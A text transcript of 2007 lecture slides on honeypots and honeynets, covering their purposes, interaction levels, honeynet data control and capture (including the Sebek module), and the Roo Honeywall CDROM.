honeypots and honeynets
DESCRIPTION
Honeypots and Honeynets. Source: The HoneyNet Project http://www.honeynet.org/ Mehedi Masud September 19, 2007 Lecture #12. Why HoneyPots. A great deal of the security profession and the IT world depend on honeypots. Honeypots Build anti-virus signatures. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/1.jpg)
Honeypots and HoneynetsHoneypots and HoneynetsSource: The HoneyNet Project http://www.honeynet.org/
Mehedi Masud
September 19, 2007Lecture #12
![Page 2: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/2.jpg)
Why HoneyPotsWhy HoneyPots A great deal of the security profession
and the IT world depend on honeypots. Honeypots◦ Build anti-virus signatures.◦ Build SPAM signatures and filters.◦ ISP’s identify compromised systems.◦ Assist law-enforcement to track criminals.◦ Hunt and shutdown botnets.◦ Malware collection and analysis.
![Page 3: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/3.jpg)
What are HoneypotsWhat are HoneypotsHoneypots are real or emulated
vulnerable systems ready to be attacked.
Primary value of honeypots is to collect information.
This information is used to better identify, understand and protect against threats.
Honeypots add little direct value to protecting your network.
![Page 4: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/4.jpg)
Types of HoneyPotTypes of HoneyPotServer: Put the honeypot on the
Internet and let the bad guys come to you.
Client: Honeypot initiates and interacts with servers
Other: Proxies
![Page 5: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/5.jpg)
Types of HoneyPotTypes of HoneyPotLow-interaction
◦ Emulates services, applications, and OS’s.◦ Low risk and easy to deploy/maintain, but
capture limited information.
High-interaction◦ Real services, applications, and OS’s◦ Capture extensive information, but high
risk and time intensive to maintain.
![Page 6: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/6.jpg)
Examples Of HoneypotsExamples Of Honeypots
BackOfficer FriendlyKFSensorHoneydHoneynets
Low Interaction
High Interaction
![Page 7: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/7.jpg)
HoneynetsHoneynetsHigh-interaction honeypot designed to
capture in-depth information.Information has different value to
different organizations.Its an architecture you populate with
live systems, not a product or software.
Any traffic entering or leaving is suspect.
![Page 8: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/8.jpg)
How It WorksHow It Works A highly controlled network where
every packet entering or leaving is monitored, captured, and analyzed.◦ Data Control◦ Data Capture◦ Data Analysis
![Page 9: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/9.jpg)
Honeynet ArchitectureHoneynet Architecture
![Page 10: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/10.jpg)
Data ControlData Control• Mitigate risk of honeynet being used to
harm non-honeynet systems.• Count outbound connections.• IPS (Snort-Inline)• Bandwidth Throttling
![Page 11: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/11.jpg)
No Data ControlNo Data Control
Internet
No Restrictions
No Restrictions
Honeypot
Honeypot
![Page 12: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/12.jpg)
Data ControlData Control
Internet
Honeywall
Honeypot
Honeypot
No Restrictions
Connections Limited Packet Scrubbed
![Page 13: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/13.jpg)
Data CaptureData CaptureCapture all activity at a variety of
levels.Network activity.Application activity.System activity.
![Page 14: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/14.jpg)
SebekSebekHidden kernel module that
captures all host activityDumps activity to the network.Attacker cannot sniff any traffic
based on magic number and dst port.
![Page 15: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/15.jpg)
Sebek ArchitectureSebek Architecture
![Page 16: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/16.jpg)
Honeywall CDROMHoneywall CDROMAttempt to combine all
requirements of a Honeywall onto a single, bootable CDROM.
May, 2003 - Released EeyoreMay, 2005 - Released Roo
![Page 17: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/17.jpg)
Roo Honeywall CDROMRoo Honeywall CDROMBased on Fedora Core 3Vastly improved hardware and
international support.Automated, headless installationNew Walleye interface for web based
administration and data analysis.Automated system updating.
![Page 18: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/18.jpg)
InstallationInstallationJust insert CDROM and boot, it installs
to local hard drive.After it reboots for the first time, it
runs a hardening script based on NIST and CIS security standards.
Following installation, you get a command prompt and system is ready to configure.
![Page 19: Honeypots and Honeynets](https://reader036.vdocument.in/reader036/viewer/2022070423/568167f7550346895ddd7263/html5/thumbnails/19.jpg)
Further InformationFurther Informationhttp://www.honeynet.org/http://www.honeynet.org/book